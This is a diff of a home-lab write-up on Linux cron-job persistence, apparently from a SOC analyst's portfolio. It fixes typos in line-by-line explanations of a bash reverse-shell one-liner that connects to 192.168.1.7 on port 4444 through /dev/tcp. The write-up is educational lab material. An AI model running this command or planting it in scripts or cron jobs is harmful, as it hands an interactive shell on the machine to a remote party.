keval-sondigara/SOC-Analyst-Portfolio/Home Lab Projects/4. Persistence/Linux Cron Job/writeup.md

 #### bash -c 'exec bash -i &>/dev/tcp/192.168.1.7/4444 <&1'

-- bash -c:- It will start a new bash shell instance and executes the string of commands contained inside the single quots.
+- bash -c:- It will start a new bash shell instance and executes the string of commands contained inside the single quotes.

-- exec:- I will replaces the current shell process with the newly specified command instead of running it as a subprocess.
+- exec:- It will replaces the current shell process with the newly specified command instead of running it as a subprocess.

 - bash -i:- It will invoke bash in interactive mode.